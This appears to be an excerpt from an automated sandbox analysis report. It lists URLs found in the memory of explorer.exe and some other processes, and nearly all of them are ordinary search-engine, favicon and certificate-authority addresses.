Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 11-27.exe, 00000000.00000002.414643524.00000000008AA000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOECCCertificationAuthority.crl0r
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl0
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt0%
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 11-27.exe, 00000000.00000002.414457082.0000000000879000.00000004.00000020.sdmp, Hmptdrv.exe, 00000002.00000002.404236135.000000000075B000.00000004.00000020.sdmp, Hmptdrv.exe, 00000005.00000002.428969812.0000000000810000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000001.00000000.370844122.0000000007890000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000001.00000000.354990906.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
